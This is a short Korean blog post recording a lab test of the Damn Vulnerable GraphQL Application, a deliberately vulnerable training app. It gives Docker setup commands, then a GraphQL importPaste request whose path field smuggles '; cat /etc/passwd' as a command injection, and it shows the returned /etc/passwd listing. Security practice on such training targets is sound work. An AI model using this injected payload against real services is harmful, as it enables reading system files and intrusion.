메뉴 건너뛰기

infra

Damn Vulnerable GraphQL Application 설치 및 테스트

suritam92024.03.15 17:29조회 수 0댓글 0

    • 글자 크기

$ sudo docker pull dolevf/dvga

 

$ sudo docker run -d -t -p 8050:5013 -e WEB_HOST=0.0.0.0 dolevf/dvga

 

postman으로 path 부분에 cat /etc/passwd 을 body 에 넣으면 된다.

 

host는 경우에 따라 응답이 안 될 때가 있는데 이유는 확인되지 않는다.

 

{

    "variables": {

        "scheme": "http",

        "path": "/ ; cat /etc/passwd",

        "port": 80, "host": "google.com"

    },

    "query": "mutation ImportPaste ($host: String!, $port: Int!, $path: String!, $scheme: String!) {\n importPaste(host: $host, port: $port, path: $path, scheme: $scheme) {\n result\n}}"

}

 

 

{

    "data": {

        "importPaste": {

            "result": "<HTML><HEAD><meta http-equiv=\"content-type\" content=\"text/html;charset=utf-8\">\n<TITLE>301 Moved</TITLE></HEAD><BODY>\n<H1>301 Moved</H1>\nThe document has moved\n<A HREF=\"http://www.google.com/\">here</A>.\n</BODY></HTML>\nroot:x:0:0:root:/root:/bin/ash\nbin:x:1:1:bin:/bin:/sbin/nologin\ndaemon:x:2:2:daemon:/sbin:/sbin/nologin\nadm:x:3:4:adm:/var/adm:/sbin/nologin\nlp:x:4:7:lp:/var/spool/lpd:/sbin/nologin\nsync:x:5:0:sync:/sbin:/bin/sync\nshutdown:x:6:0:shutdown:/sbin:/sbin/shutdown\nhalt:x:7:0:halt:/sbin:/sbin/halt\nmail:x:8:12:mail:/var/mail:/sbin/nologin\nnews:x:9:13:news:/usr/lib/news:/sbin/nologin\nuucp:x:10:14:uucp:/var/spool/uucppublic:/sbin/nologin\noperator:x:11:0:operator:/root:/sbin/nologin\nman:x:13:15:man:/usr/man:/sbin/nologin\npostmaster:x:14:12:postmaster:/var/mail:/sbin/nologin\ncron:x:16:16:cron:/var/spool/cron:/sbin/nologin\nftp:x:21:21::/var/lib/ftp:/sbin/nologin\nsshd:x:22:22:sshd:/dev/null:/sbin/nologin\nat:x:25:25:at:/var/spool/cron/atjobs:/sbin/nologin\nsquid:x:31:31:Squid:/var/cache/squid:/sbin/nologin\nxfs:x:33:33:X Font Server:/etc/X11/fs:/sbin/nologin\ngames:x:35:35:games:/usr/games:/sbin/nologin\ncyrus:x:85:12::/usr/cyrus:/sbin/nologin\nvpopmail:x:89:89::/var/vpopmail:/sbin/nologin\nntp:x:123:123:NTP:/var/empty:/sbin/nologin\nsmmsp:x:209:209:smmsp:/var/spool/mqueue:/sbin/nologin\nguest:x:405:100:guest:/dev/null:/sbin/nologin\nnobody:x:65534:65534:nobody:/:/sbin/nologin\ndvga:x:1000:1000:Linux User,,,:/home/dvga:/bin/ash\n"

        }

    }

}

    • 글자 크기
Pixi 설치하기 (by suritam9) OWASP Juice Shop (by suritam9)

댓글 달기

suritam9
2024.03.12 조회 0
suritam9
2024.03.10 조회 1
suritam9
2024.03.11 조회 3
suritam9
2022.10.26 조회 22
suritam9
2022.07.10 조회 73
suritam9
2021.01.02 조회 130
첨부 (0)
위로